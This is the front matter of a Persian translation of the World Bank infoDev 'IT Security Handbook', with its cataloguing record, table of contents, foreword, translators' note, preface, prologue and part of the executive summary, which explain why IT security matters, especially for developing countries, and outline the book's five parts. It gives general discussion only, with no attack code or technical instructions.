IT Security Handbook

Authors: George Sadowsky, James X. Dempsey, Alan Greenberg, Barbara J. Mack, Alan Schwartz
Translators: Mahdi Mirdamadi (mirmahdi@ashnasecure.com), Zahra Shojaee (z.shojaee@ashnasecure.com), Mohammad Javad Samadi (m.samadi@ashnasecure.com)
Secretariat of the High Council of Informatics
Tir 1384

Cataloguing record
IT Security Handbook / authors George Sadowsky [... et al.]; translated by Mahdi Mirdamadi, Zahra Shojaee, Mohammad Javad Samadi. Tehran: High Council of Informatics, Secretariat, 1384.
509 pp.: tables. 50,000 rials. ISBN: 964-8846-26-x
Title in English: IT Security Handbook
Catalogued on the basis of FIPA information.
Bibliography: p. 509; also as footnotes. Index.
1. Information technology -- Security measures. a. Sadowsky, George. b. Mirdamadi, Mahdi, 1359- , translator. c. Shojaee, Zahra, translator. d. Samadi, Mohammad Javad, translator. e. High Council of Informatics. Secretariat. f. Title.
T58/5/ر23 1384; 303/4833; National Library of Iran: م84-17525

This book is a translation of:
George Sadowsky; James X. Dempsey; Alan Greenberg; Barbara J. Mack; Alan Schwartz; IT Security Handbook; infoDev, Worldbank; 2003. (ISBN: 964-03-9951-5; http://www.infodev-security.net/handbook)

Publication details
© Copyright 1383: Secretariat of the High Council of Informatics
Technical editing: Mahdi Mirdamadi
Layout and typesetting: Maria Ghaderi (maria_ghaderi@yahoo.com)
Lithography, printing and binding: Golvazheh Publishing Company
Print supervisor: Saeed Zeraati (ss_zeraati@yahoo.com)
Printing: first, 1384
Print run: 1500 copies
ISBN: 964-8846-26-x
Secretariat publication serial number: 84-14
Price: 50,000 rials
Postal address: Tehran, Shariati Street, before the Shahid Ghoddousi crossroads, corner of Andisheh 1, No. 808
Telephone: 88448037 and 88448038; Fax: 88448038; P.O. Box: 16315-1315
Website: http://www.scict.ir

Contents

Foreword
Translators' Note
Preface
Prologue
Executive Summary

Part One. IT Security in the Digital Age

Part Two. IT Security and Individual Users
  Chapter 1. Introduction
  Chapter 2. Understanding Security Concepts
  Chapter 3. Computer and Data Security
  Chapter 4. Security of Operating Systems and Application Software
  Chapter 5. Malicious Software
  Chapter 6. Security of Network Services
  Chapter 7. Tools for Improving Security
  Chapter 8. Special Notes for Different Platforms
  Appendix 1. Introduction to Encoding and Encryption
  Appendix 2. TCP/IP
  Appendix 3. Glossary of Technical Terms

Part Three. IT Security and Organizations
  Chapter 1. Introduction
  Chapter 2. Overview of Methods for Reducing the Effects of Electronic Security Risks
  Chapter 3. Risk Assessment and Loss Analysis
  Chapter 4. Planning for Security Needs
  Chapter 5. Prevention and Organizational Security Policy
  Chapter 6. Personnel Security
  Chapter 7. Security Outsourcing
  Chapter 8. Legislation, Drafting of Government Regulations, and Privacy Policies
  Chapter 9. Computer Crime
  Chapter 10. Managing Mobile Risks: Electronic Financial Services in a Wireless Environment
  Chapter 11. Best Practices: Building a Security Culture
  Chapter 12. E-Commerce Safety Rules for All Users and Companies
  Chapter 13. International Dialogues on Security

Part Four. IT Security and Government Policies
  Chapter 1. Introduction
  Chapter 2. Protecting Government Systems
  Chapter 3. The Role of Law and Government Policies on the Private Sector
  Chapter 4. Government Cyber-Security Policies

Part Five. IT Security and Technical Administrators
  Chapter 1. Introduction
  Chapter 2. Security for Administrators
  Chapter 3. Physical Security
  Chapter 4. Information Security
  Chapter 5. Identification and Authentication
  Chapter 6. Server Security
  Chapter 7. Network Security
  Chapter 8. Types of Attacks and Ways of Countering Them
  Chapter 9. Intrusion Detection and Management
  Chapter 10. Special Notes for Different Platforms

Part Six. Annexes
  Annex 1. Glossary
  Annex 2. Bibliography
  Annex 3. Electronic Resources
  Annex 4. Security Organizations
  Annex 5. Print Resources

Common Security Words and Terms

Foreword

The concept of security in the real world has been, and remains, a vital and thoroughly familiar concept for humankind. In prehistoric times security was an entirely physical concept, consisting of the basics of survival, such as safety from attack by other people or animals and the security of the food supply. Gradually other needs, such as security against natural disasters or disease and having a place to live and rest without facing danger, were added to humanity's earlier needs. With the advance of civilization and the formation of societies, the scope of security took on far broader dimensions; with the separation of individuals' property and personal rights from one another and from public property, and with the definition of national and international domains, it gradually came to include broad concepts such as privacy, social security, financial security, political security, national security and economic security. Although these concepts were no longer entirely limited to humanity's physical needs, realizing and attaining them still largely required the existence or use of real, physical environments.
In recent decades, however, and especially in the past five years, the world has been the scene of remarkable developments that have fundamentally altered many earlier relationships and equations. These developments, made possible by the extensive use of information and communication technology, began with the use of the computer as a tool for automation and higher productivity and now, as that use has evolved into the creation of a space of collaborative synergy (collaboration), have in practice transformed the individual and social life of humankind. In the view of many experts, just as the emergence of writing had so profound an effect on human destiny that it led historians to divide the story of human life on this earth into prehistory and history, so entry into the virtual space created by modern information and communication technology has marked a new era of human civilization, such that the revolution of the information age has transformed the ways of thinking, production, consumption, commerce, management, communication, war, and even religious practice and love.

This great transformation has brought with it many requirements and consequences, among the most important of which is the emergence of the new concepts of virtual security, or security in cyberspace. With the change in what the term "computer network" denotes, from a small workgroup network to a vast, global network (the Internet), and given the ever-growing interactions and exchanges that take place over computer networks, the need for electronic protection and security regimes that guarantee exchanges and create legal obligations for the parties involved is vital: regimes comprising laws, methods, standards and tools that are even more binding than conventional contracts and traditional methods and that, at the same time, guarantee more than ever the security and privacy of the sensitive information exchanged.
Information security in virtual environments has always been emphasized as one of the basic infrastructures and requirements for the developmental and pervasive use of ICT. Although absolute security is unattainable, whether in the real world or in cyberspace, establishing a level of security that is sufficient and proportionate to the needs and to the investment made is possible in almost all environments. Only when such an adequate level is in place will individuals, organizations, private companies and government bodies, trusting the various parties who are all involved in an electronic exchange and who have probably never seen and do not know one another, play their expected role as effective nodes of this interactive, synergistic network.

Assurance that the country's information assets and infrastructure equipment are safe is, beyond its broad national-security dimensions, the key that unlocks countless new commercial and non-commercial opportunities on the Internet. What is certain is that the security challenge facing the country is not a lack of access to technology or an absence of security products, but rather policymaking, culture-building, making proper use of existing resources, and adapting them so that they meet the unique needs of the country's network and digital space. In this regard it is essential to note that information security architecture is one of the ongoing processes within information technology architecture at various levels, national and organizational alike, and that in this process the necessary tools will be used as appropriate and as needed. Another important point, drawn from the experience of leading countries, is that information security is a cross-sectoral matter and requires extensive cooperation. This cooperation must be attended to at both the national and the international level. Determining roles, duties and responsibilities is among the important points that must be defined in this cooperation.
Today the security of the digital space presents a new facet of every country's national security. It is hoped that, in parallel with the rapid development of the various uses of information and communication technology in different subsectors under the TAKFA program, by identifying and designating the country's key infrastructures that depend vitally on information, and then planning, organizing and investing appropriately to protect them, the path of the country's all-round development toward a knowledge-based society will be smoothed.

Fortunately, in recent years, following the Cabinet's approval of the program for the Development and Use of Information and Communication Technology (TAKFA), which reflected the attention and insight of the country's senior management in its new approach to national development, technical studies and reviews to prepare for security needs and for security in computing environments have begun and have grown rapidly. The findings of the relevant working group led to the recognition of broader areas of need, and on that basis, with the approval of the Cabinet and the President, the High Council for the Security of the Country's Computing and Internet Environment has begun work under the responsibility of the First Vice President; God willing, the results of its reviews and decisions will soon be announced in the form of directives and the national document on the security of the country's computing space.

The Secretariat of the High Council of Informatics, continuing its related activities, is striving to strengthen the country's existing knowledge in the field of information technology by preparing, translating and authoring technical material in a suitable setting. The present book is among the very useful, comprehensive and recent documents in the field of computer technology security, and is offered to the country's ICT practitioners.
Nasrollah Jahangard
Secretary of the High Council of Informatics and Special Representative of the President

Translators' Note

Correct use of accurate information is one of the most important requirements for organizations to achieve their organizational goals, and the reliability, integrity and availability of that information are very important characteristics for its usefulness. The advantages of storing information electronically have made the widespread use of computers for business purposes inevitable, and the use of computer networks, especially the Internet, has brought fundamental changes to the way business is done and has put a vast amount of information only a fingertip away from us; it goes without saying that in this complex environment, with such extensive connectivity, wide-ranging risks threaten computer systems, information systems, and the vital activities and infrastructures that depend on them.

In today's world, funds are increasingly moved electronically, information of low and high sensitivity is transmitted over networks, computer systems are very rapidly becoming more complex and more connected to the outside world, and simple tools for intrusion and for exploiting vulnerabilities are more available than ever to the adventurers and criminals of the virtual world; each of these factors is by itself a solid reason to take security seriously.

The overwhelming majority of organizations are exposed to all kinds of internal and external threats from saboteurs, such as tampering with reference information or theft of vital information and information assets. In such conditions, factors that can count among the advantages of systems (such as speed and high accessibility) may, if not kept under control, give rise to vulnerabilities, and their abuse by ill-intentioned people may lead to intrusion and sabotage, fraud, or extortion. In addition, natural problems and unintentional errors made by computer users can have destructive results in the absence of proper procedures for protecting information.
Alongside all these issues, organized crime in the virtual world adds to the complexity of governments' task of securing the vital infrastructures of public services, and the significance of misuse of government resources doubles the importance of governments addressing security properly and effectively. The latest global statistics on incidents at government and commercial websites caused by viruses, worms and denial-of-service attacks clearly illustrate the vulnerability of these systems. According to estimates by the security agencies of the United States (which is regarded as a leader in information and communication technologies), the losses resulting from breaches of organizations' security in 2003 alone were estimated to amount to 10 billion dollars.

Given all this, devising and implementing security measures against these wide-ranging threats is an unavoidable necessity for organizations. Appropriate measures can minimize the likelihood that risks materialize, keep the resulting damage very small if they do, and create a capacity for fast and effective response, so that organizations use predefined processes to repair the damage, the productivity and safety of information increase, and business continues with greater peace of mind.

The "IT Security Handbook" was compiled, once the need to address security had been recognized, at the commission of the World Bank by the infoDev group (one of the World Bank's units) as an effort to raise the level of IT security in the member countries of that international body, and was first distributed among participants at the first World Summit on the Information Society (WSIS) in Switzerland in December 2003. The contents of the book are the result of reviewing many books, articles, theses and specialized documents by experts and specialists in this field around the world. A complete list of these references appears in Part Six (Annexes), and readers can consult them to learn about the latest points and topics as well.
Besides presenting a set of definitions and general security practices, the present book also considers their technical and managerial aspects. In the original text, and likewise in its translation, an effort has been made to present the material as far as possible in a way that does not require specialized knowledge of the field to understand and that can serve a broad community of IT users (especially managers); chapters of it can therefore be used in training seminars and short courses.

Worldwide, numerous books have been published on the security of information and communication technology, and recently a number of them have been translated into Persian by experienced or young translators; but because they usually address a specialized topic within security, they lack a high-level, managerial view of the subject. The book before you, taking a high-level view of security, tries to explain the concepts at issue in each of its areas and, where necessary, does not neglect technical aspects, although it never goes so far into technical matters as to lose its broad perspective, leaving that task to specialized security books.

The translators of this work have always tried to remain faithful in conveying the book's concepts and points; they have never sacrificed meaning to wording, and in many cases they have coined words or equivalents, which is exhausting work that carries responsibility. Other terms for which no Persian equivalent was found or coined are repeated in their original form in the translation. We hope that readers, whether experts, professors, students or other interested people, will make us aware of any slips and shortcomings in this book through their suggestions and criticism, so that we can set about correcting them.
To avoid confusing readers who have only recently become interested in information security and are not yet very familiar with security terms and their common equivalents, a list of the common security words and terms used in the book, together with the Persian equivalents used for them, has been included at the end of the book. The layout of the book also follows the original edition: except for Part Five, where the full width of the page is used for the text because of the large amount of technical text and program code, the other parts use a two-column layout.

Finally, we feel obliged to thank sincerely Ms. Maryam Eftekhari and Messrs. Mohammad Mahdi Jaghouri, Afshin Lamei and Nima Lotfi, who took pains in preparing this work; all the professors and experts whose expert and constructive comments encouraged us in this task; all the colleagues who in some way had a part in preparing and arranging this work; and the Secretariat of the High Council of Informatics, which undertook the printing and publication of this book.

We hope this book can have an effect, however small, on the country's progress and development on the way to a prosperous, free and proud Iran.

The Translators
Summer 1384

Preface

All funding for the preparation and compilation of this book was provided by the infoDev Program of the World Bank Group. In recent years the subject of IT security has gained particular importance and has for that reason attracted the attention of the infoDev Technical Advisory Panel. Here we wish to express our thanks and gratitude for the attention of the State Secretariat of Economic Affairs of Switzerland (SECO), not only for funding this project but also for recognizing the urgency of the issue and bringing this book to fruition.

Information and communication technology (ICT) plays an important role in economic and social development, but it should not be forgotten that effective use of information and communication technology is impossible in an insecure and unreliable environment. IT security therefore has a fundamental and decisive role in creating the conditions needed for the successful implementation of national ICT plans, e-government, e-commerce, and projects in education, health, or finance and credit.
IT security is a complex subject and evolves almost in step with technology. In this book the authors have been able to present the best practices and recommendations, independent of technology, for particular IT environments. Readers can also visit the website www.infodev-security.net to obtain up-to-date and relevant information and, through this steady stream of information, keep abreast of new developments in IT security. Bearing in mind that the material presented in this book does not necessarily reflect the views of infoDev or the World Bank Group, we believe that using this book together with its website can greatly help the understanding of IT security issues throughout the world.

The book consists of five parts, each of which can be studied separately. After a short introduction to the general topics of IT security, you will find material suited to individual users, small and medium-sized organizations, government, and technical administrators. Although most of the published research and articles on IT security are found in developed countries, the authors have tried to offer practical and effective guidelines that can also be used in developing countries.

We hope that the publication of this book and the launch of its website will be the starting point of an interactive process in which practices and technology advance together; what matters most along the way is that the readers of the book also share their own suitable and effective methods and practices with others.

Mohsen A. Khalil: Director, International Information and Communication Technology Department, World Bank Group
Bruno Lanvin: Manager, infoDev Program, World Bank Group
Michel A. Maechler: Task Manager for Information Development, Senior Informatics Specialist, World Bank Group

Prologue

The advance of information and communication technology and the innovations arising from it have brought a striking rise in productivity and the emergence of new kinds of goods and services. With the steady improvement in the power, capacity and price of microelectronic equipment, which has led to annual growth of about 30 percent in performance relative to price, use of this technology has become possible for everyone. Today we live in a world in which information processing is cheap and the cost of telephone communication is falling, and the world is increasingly engaged in exchange and interaction.

But the availability of new technical capabilities has not only produced new products and better, more efficient ways of doing things; it has also increased the possibility of misusing technology. Like other technologies, information and communication technology is a tool: it can be used in a way that benefits everyone, or in a way that produces dangerous results. Speed in information and communication technology is on the order of microseconds, so that information that cannot be seen with the naked eye is moved about under the control of software written by people. In such a setting illegal and destructive acts happen so fast that they may go undetected, although detecting them is not impossible.

Problems concerning the security of information systems, the processes that depend on them, and the electronic storage and transmission of information are not new. Commercial computer systems are nearly fifty years old. Banking systems, too, began transferring money electronically at about the same time.
In these commercial systems there are strong incentives to commit crime by breaking into computer networks and financial systems. In response to the growing likelihood of criminal activity, and in order to provide stronger security measures in communications and processing, information research and development projects have been launched.

Much has changed in the past half-century. The personal computer revolution that began in the mid-1970s has now put computers of considerable size and power within reach of hundreds of millions of people. In addition, the Internet and other kinds of private networks have made computer-to-computer communication possible among a great many people. Twenty-five years ago, working with computers and setting up communications was generally done by a small number of specialists in the field; today hundreds of millions of computers are used to process every conceivable kind of information and are connected to one another by a powerful communications network called the Internet.

This network has expanded communication among people through e-mail and instant messaging, and has also provided easy and relatively cheap access to digital content and to the documentation of technical equipment and of products under development. Naturally, problems grow in proportion to technological progress. Most users of computer networks in the 1970s were professional computer specialists, whereas today most users are non-professionals; their lack of sufficient knowledge may therefore mean that they do not make proper use of secure software packages, with the result that intruders and computer criminals, regardless of their own or the user's geographic location, can attack the system and abuse it.

If you use a computer at home or at work, responsibility for protecting the information on it rests with you. This book helps you learn the technical details and how to work with a computer or a network of interconnected computers. Working to maintain security is every individual's duty. That individual may be an ordinary user, a technical specialist, a system administrator, a network administrator, or the manager of a system or network in an organization.
Attention to the importance of security leads to necessary and reassuring steps being taken to protect systems, and using an effective set of security policies is an important step toward ensuring this. In that case, in most instances your computers and information will be safe from unauthorized access, and you will be able to exchange your information securely with others over the network.

This book was prepared at a time when the use of information and communication technology in socio-economic development had reached its peak; moreover, for 40 years or more it had been used in most of the regional or operational projects carried out by dual-purpose or multi-purpose aid agencies. The belief that information and communication technology is an important and vital matter for launching many development activities is relatively new, and dates back to the launch of the global Internet in the early 1990s. It was first formally declared in a multi-purpose institution by the infoDev program of the World Bank Group in 1995, with the intellectual support of the then President of the World Bank, James Wolfensohn, who placed great emphasis on the importance of sharing information for achieving the goals of socio-economic development. From then on optimism about socio-economic development grew, in part because of the spread of inexpensive technologies around the world.
In 2001 the G8 member countries established the Digital Opportunity Taskforce Group (DOT). The DOT presented the results of its work in a report and called for 9 topics to be included in the Genoa Plan of Action, all of which were endorsed and signed by the G8 leaders at the Genoa summit in 2001. The principal members of the DOT are the main stakeholders of the G8 and the governments of developing countries, the private and non-profit sectors, and a large number of international organizations. The report contains 7 action items as vital topics for building the information society:

1) Support for policies
2) Promoting and improving access
3) Human resources development
4) Fostering entrepreneurs and entrepreneurial activities
5) Participation of developing countries in international conferences on information technology
6) Use of technology in health
7) Application software and local content

One outcome of this report was the creation of the U.N. Secretary General's ICT Task Force; another was the formation of the Global Digital Opportunities Initiative with funding from the United Nations Development Program (UNDP), the Accenture Foundation and the Markle Foundation. At present, dual-purpose institutions are also paying increasing attention to information and communication technology in their development projects. Subsequently ITU and UNESCO also put forward plans for holding two world summits, named the World Summit on Information Society (WSIS), in Geneva (December 2003) and Tunis (April 2005).

Information and communication technology can indirectly support many activities aimed at achieving the Millennium Development Goals (MDG). Core policies for IT security and their implementation in a country will strengthen the flow of foreign direct investment into that country, and these investments lead to funding for securing many economic infrastructures.
The question now arises why this book, written primarily for readers in developing countries, is needed. In answer it should be said that security principles are always the same, regardless of whether you are in a developed, developing or undeveloped country, because technologies and the threats associated with them may appear from any corner of the world. There are of course various ways of securing computers and networks, which are certainly not always available and cheap in developing countries.

First, it is important to note that computer users and administrators in developed countries have very extensive access to practical and technical information that can help them in their various areas of work. For example, there are many bookshops and libraries that use computers, so asking peers for help is easy. When a computer or network runs into a problem, there is a rich set of information channels through which security news and information are sent. Organizations that use computers and networks have help centers that are run by technical specialists and are able to prevent the misuse of organizational resources and to keep them protected.
Users and technical administrators in developing countries usually lack the ability to provide this level of support. The number of users is small, and the warnings and solutions that are issued are not heeded. Organizations that use computers often have only a small staff and therefore cannot oversee their own internal technical resources. Often this inattention and inability stem from a lack of sufficient information and knowledge about computer systems and network security, and groups that have grasped the basic principles usually still have difficulty understanding how to adapt technical solutions to the changing and unpredictable conditions of this environment.

In the past, after-sales service was provided without limit for computers that were few in number and expensive; today, given the sheer volume of computers on the market, such services cannot easily be offered. Computer shops and repair centers are usually unaware of problems arising elsewhere in the world, and as a result users and administrators become victims of the development of information about technology security.

Network security breaches happen in every country and may even put governments under pressure. Many of these breaches usually go unreported, because public knowledge of them can have undesirable consequences. Governments and organizations in developed countries are generally able to cope with such breaches, but the consequences of security breaches and failures in developing countries can be far more severe than in developed countries. Alongside all this, markets, organizations and governments in developing countries have little inclination to fix security flaws, because of inattention to the consequences of large-scale computer intrusions, an inability to analyze the financial losses caused by these attacks, and the lack of a proper estimate of the time needed to repair the damage (if the damage can be repaired at all).
Developing countries must treat security as their top priority, because the risk of criminal activity is directed mostly at places that lack adequate control and are insecure. E-commerce in countries where IT security is less well provided is a more attractive target for attack. Which small or medium-sized organization can remain standing after the theft of confidential customer information and business files, or the tampering of the organization's key information? Developing countries must improve the capacity of their trained human resources and their technology infrastructure so that they are not easy targets for cybercriminals. This book contains a great deal of discussion about the nature of security, because there are differing views on the need for it. People who are concerned about data see the matter as a topic in the field of information security; those who deal with the technical mechanisms for storing and transmitting information see it from the standpoint of system and network security; while others who are engaged in commerce look on it as a new area of commerce, generally under the heading of electronic security.

Given these issues, we have chosen to present all the topics that fall under "information technology security" and in this way to address all the mechanisms for storing, processing and transmitting information, hardware, software, and the facilitation of communications, with a particular focus on the security of the information itself. It is important that both information and the mechanisms that process it be protected from misuse.
In this book we have deliberately limited our attention to computers, software and networks, because there are many rich sources for the details of other matters, such as fixed and mobile telephony, that are closely related to these issues and are not covered here. As telephone and computer technologies converge, such issues also become more important. With the advent of Voice over IP and ENUM, digital telephony protocols are also finding increasing use, and with the advent of 3G technologies, attention will gradually have to be paid to matters such as security in them too.

This book has been prepared so that it is also available at low cost in developing countries. The aim of publishing it is not to achieve a large print run; rather, the intention is for its content to be offered on a global website that is dynamic in two respects: first, that its content is kept as up to date as possible, and second, that it offers useful and appropriate information to readers seeking information about IT security.

The reader should note that the authors have used different terms for the subject of security and computers. In general, information technology security refers to the following topics:

1) Computer security: security from a technical standpoint in machines, software, data and networks. This term is used mostly in Parts Two and Five, which focus more on the physical, infrastructural and technical dimensions of technology security.
2) Cyber-security: information technology security as it relates to government policy. This term is generally used by government bodies and national policymakers in documents, laws and research projects, and is more or less synonymous with "Internet security" (a term not referred to in this book but sometimes seen in other references). Both expressions refer to aspects of network security and the principles of network policymaking, such as the definition of privacy, cybercrime, and global commerce and communications. The difference between these two terms is not great; rather, as can be seen in many chapters of this book, the security of computers, networks and data is to a large extent intertwined with the everyday concepts of security in cyberspace.

The content of this book is divided into five parts, each suited to a particular group of readers. It should be noted that some shared and repeated material can be found in different parts of the book, because this way many readers can choose to read only the part of the book that is useful to them. Some parts, especially those that explain security and computer users, can be published independently and distributed among the users who need them.

In today's fast-moving world, writing a handbook runs the risk that it will become outdated shortly after publication. To keep the content of this book up to date, all of its parts are available on a website at www.infodev-security.net so that each can be updated in future. Readers who wish to contribute useful material to the website's updates can send their suggestions to contact@infodev-security.net.
In preparing this book we have had to strike a balance between general principles, specific examples and practical information, and we hope the balance struck is an appropriate one. Although technical details will change as technology advances and evolves, these principles will always remain constant, and readers will be able to understand them easily from the policy and management standpoint as well as the technical one. If these principles are understood properly, technical solutions will be readily accessible.

This book would never have been possible without the support of a number of special and important individuals and institutions, among them Simson Garfinkel, who gave important guidance in shaping the initial structure of the book and later helped to identify and coordinate part of the team that produced it. Publication of this handbook would not have been possible without his guidance and help. Bruno Lanvin, manager of infoDev, who allocated considerable funding to conveying the relevance and power of creating and distributing information in the field of information and communications technology; also Jacquelin Dubow, Ellie Alavi, Teri Nachazel and Heriri Bretadeau, all of whom are managers at infoDev. We also thank the O'Reilly team who, with the support of their company, O'Reilly & Associates, published the following two books: Practical Unix and Internet Security, 3rd Edition (Simson Garfinkel, Gene Spafford and Alan Schwartz, 2003) and Web Security, Privacy & Commerce (Simson Garfinkel and Gene Spafford, 2002). These books were used to complete important parts of this handbook, and several of their sections have been reused in it with reprint permission from the authors and publishers.

In addition, over the past ten years O'Reilly & Associates has made tens of thousands of its technical titles available to people in developing countries. Readers who have seen the state of books and access to published material in the developing world know how effective and important O'Reilly's contribution has been to building these countries' scientific capacity to learn about, spread and make use of the Internet, and so to reduce the digital divide.
We feel obliged to warmly thank the compilers of the above-mentioned books for their generous and enthusiastic help in allowing material from their books to be used in parts of this handbook. Their enthusiasm for helping this handbook into print is the best example of professional cooperation and information sharing in today's new Internet civilization.

Here we must also thank Tom Kellermann, Senior Data Risk Management Specialist in the Integrator Group and Treasury Security Team of the Operations Policy Department of the World Bank. His writings on e-finance, blended threats and mobile risk management were used in Part Three of this book.

Max Schnellmann, the Swiss representative on the information development committee at the Chongqing meeting in China in 2002, was also one of the first to recognize the importance and usefulness of an IT security handbook in developing countries, and it was his support and recommendations that led to the Swiss government's backing of infoDev for the publication of this book; we acknowledge his support here.

Michel Maechley also formed a group of active specialists to prepare the content of this book, and it was these people who offered valuable suggestions for improving the accuracy and balance of the final version; we thank them here for their constructive guidance, and we also express our thanks and gratitude to everyone involved in, and everyone who helped with, the printing of this book.

This book is neither a tutorial reference for the Unix, Windows or Macintosh operating systems nor a reference for teaching system administration; rather, it should be used alongside the administration guides for these systems.
Managing extensive changes to computer systems can make them difficult to support, even when those changes are needed to raise the level of security. For readers' convenience we have pointed to many Internet resources, but readers who use the programs and patches suggested on the Internet must exercise caution, because after changes to the kernel, architecture or commands of systems, assessing their security effects at the macro level may not be straightforward. If solutions and programs from different vendors are deployed or installed routinely, the overall level of security may be weakened in the long run; attention must therefore also be paid to the compatibility of system components and to the quality and reputation of the companies that provide technical and consulting services.

We hope this book makes these matters easier for you to understand, and we are confident that readers will also help to improve the quality of its content in future.

Executive Summary

The IT Security Handbook is a practical guide to understanding and carrying out the steps toward security in information technology applications at your home and workplace. Although this book presents the best and newest approaches in the field of information technology, it was written primarily for readers in developing countries. In addition to summarizing the physical and electronic threats present in the field of IT security, the book deals with the management approaches, regulatory environments and patterns of cooperation among partner organizations that currently exist in markets, governments, professional bodies and international organizations. The book consists of five parts, each of which can be read independently of the others.

This executive summary covers the main topics of the book and, in a section titled "Highlights of the Book", gives an overall picture of each part.
Adoption of Information and Communications Technology Is Increasing

The book begins with an overview of the growth of the information and communications technology (ICT) sector. This growth extends to ordinary ICT users, and can be seen in the rising number of home networks and the growth of small and medium sized enterprises (SMEs), which rely on computing resources to support markets that depend heavily on the development of technology and its use around the world.

Available Information on the Record of IT Security Activities

Because the market for technology products and services is growing markedly at both the individual and organizational levels, awareness of IT security issues is very useful and important. Individual users may be unaware of the risks they face when using the Internet. Even if users recognize the dangers of unprotected networks, they may still put off learning about firewalls, virus scanners, encryption and the systematic maintenance of information because of the cost and time involved and the change it brings to their computing behavior. In addition, small and medium sized organizations may use a single technical solution such as a firewall while paying no attention to the layering of security levels, not realizing that without it the system's security is seriously at risk. They may also, for various reasons, delay securing their systems and neglect to draw up clear security policies for users and managers. If proper communication, awareness and training are lacking in the organization, criminals may easily get past the technical protections.
Technology in a Changing Environment: Mobile Devices, Popular Application Software, and Threats That Create Complexity

At present, new and non-expert users are not the only cause of IT security breaches. The ICT environment is changing rapidly with the emergence of new products, especially mobile devices (such as laptops, mobile phones and personal digital assistants, PDAs) that pose different challenges for infrastructure and data security. The emergence of computer applications for electronic investment and electronic commerce has also introduced complexities into networked environments.

From the advent of automated teller machines to the spread of online banking, these capabilities bring useful cost savings, but they also carry potential threats and risks.

What makes matters worse is that intruders are now able to develop and extend their threats, for example with combinations of viruses, worms and Trojans that can inflict more severe damage on these systems and data. This damage can be even more dangerous than that of some malicious software (malware). Since all of these developments affect technology users worldwide, the best ways of countering the resulting threats can only be achieved through international cooperation.

International Cooperation and Security in Developing Countries

IT security is of great importance in developing countries. Clearly the Internet has provided golden opportunities for commerce and communication that were hard even to imagine about ten years ago. Access to the Internet is of course not always cheap. The Internet enables users to look at a vast range of subjects, and through it people's communication by e-mail has become far more efficient than traditional postal services.
The Internet has also affected the principles of international trade; markets in developing countries can now sell their goods online. Although the number of competitors in the market is still very large, customers can easily view the capabilities and products of rival companies and do not need extensive knowledge of the field to do so. Since access to markets beyond geographic borders is highly attractive to any economic system, broad cooperation is needed to establish a model of an efficient, global networked order.

Highlights of the Book: IT Security and Developing Countries

Highlights of Part One: IT Security in the Digital Age

Part One of the book is an introduction to general security topics in the electronic age. People have always been concerned about security, but the invention of computers and networks has changed the way things work. This part maps out the scope of IT security topics, explains many kinds of improper acts against computers and networks, and introduces the risks of working with them without appropriate security measures. Part One covers the following:

• The digital revolution
• Definition of security
• The emergence and growth of the Internet
• Overview of security issues
• Attackers on IT security

Awareness of general IT security topics, such as the existence and spread of particular security threats, will help users, managers and policymakers to use effective measures to strengthen the safety of their networks at home or at work against security breaches.
Highlights of Part Two: IT Security and Individual Users

Part Two of the book addresses users who use network and computing resources for a variety of purposes at home or at work, and will also be useful to small organizations that are not in a position to define IT security policies precisely and administer them at the organizational level. This part explains the basic principles of security for users and offers guidance on techniques that reduce security threats. Some of the topics covered in Part Two are:

• The need for computer and network security;
• The impact of security breaches;
• Physical security, and support for authentication through usernames and passwords;
• Types of malicious software and how they spread;
• How e-mail and the Internet work and why they are a vehicle for computer attacks;
• Software tools including virus scanners, firewalls and remote access tools;
• More advanced concepts, such as the structure of TCP/IP networks and encryption, for interested users.

Part Two covers security issues and methods of reducing risk fully from the technical standpoint. This part looks at security from the viewpoint of home users, and Part Three from the organizational viewpoint.

Highlights of Part Three: IT Security and Organizations

Part Three of this book examines the policy and administrative dimensions of security from the organizational viewpoint. Adopting suitable security policies and implementing them correctly reduces the risk of sudden loss of information, makes unauthorized entry to the system much harder, and provides the security tools for identifying attacks and correcting security flaws. To protect confidential data and help maintain the integrity of stored programs and data and of the transfer of these data across the network, policymaking must be combined with its implementation. This part covers the different components of effective security policies for different kinds of organization, such as commercial companies, governments, universities and non-profit organizations.

Part Three examines the following topics in detail:

• The eight-pillar approach to security, which is especially valuable in financial and credit service environments;
• Security risk assessment and security analysis in a typical company;
• Proposed policies and procedures for drawing up security programs and plans;
• The role of management in securing computers, networks and data;
• Personnel security, including training and awareness, the hiring process and the use of outside security resources;
• Computer crime, incident reporting and disaster recovery;
• Security threats of wireless technologies for companies; and
• Annex guidelines and factors that help in designing and implementing appropriate organizational security.

Part Three also gives a general overview of policies that relate directly to commercial, non-profit and government operations in the networked world, and addresses the discussions of experts and the World Bank's international dialogues on IT security. Part Four raises deeper issues concerning laws and general policies in the cyber world and examines these matters in a global context.

Highlights of Part Four: IT Security and Government Policy

Part Four of this book examines the security topics that need to be understood at government level. In addition to securing its own information resources, a government must be committed to drawing up a set of policies for securing its national information infrastructure. These policies play an important role in IT security, yet there will also be a contradiction: the national policy framework must be able to raise the level of security, but weak government laws will do more harm than good.
Technology is changing rapidly, and new computer threats arise because of these very changes. In such a situation government laws are used to catch criminals and prevent the spread of new kinds of wrongdoing. Achieving a proper balance between legislative and non-legislative measures is therefore very important. Clearly the government's cyber-security policies must be drawn up with regard to the social and technical characteristics of the Internet. In this area governments can take many steps to improve computer security without intervening in technical matters.

Part Four contains the following topics:

• The communications network and other critical infrastructure that belong to the private sector but are overseen by government (a picture of the interdependence of government and the private sector);
• The overall role of government and its duties in improving computer security in the public, private and non-profit sectors;
• Computer crime laws drawn up to protect private and government computers and networks;
• Traditional concepts that have in some way been carried over into computer law;
• Government laws, regulations and policies that emphasize improving computer security in the areas of consumer protection, personal communications data and e-commerce frameworks; and
• Examples of the policies and laws of a number of countries and references at recognized international organizations.

Part Four assesses security from the legal and high-level policy standpoint. Part Five takes a deeper look at the technical tools and procedures needed to provide IT security.

Highlights of Part Five: IT Security and Technical Administrators

Part Five helps network and system administrators to carry out their duties more efficiently. This part covers issues that must be understood at both the technical and managerial levels, for example how security controls are breached or what the methods of countering threats are. The other parts of this book give an overview of matters such as home user security, security from the organizational standpoint and the implementation of high-level security policies. Part Five examines specific security threats in detail, including the different methods of attacking systems and programs, methods of monitoring traffic on important networks, best practices for securing these systems, and the proper way of working with security tools in a crisis.

Part Five contains the following:

• The design of security systems and the methods used by system intruders;
• The various threats to IT security, from environmental factors to sabotage and information theft, and approaches for countering them;
• Mechanisms for protecting data against unintentional disclosure, known as data confidentiality (preventing unauthorized users from accessing the system and changing data and programs) and data integrity (assurance that software and information will remain intact and correct);
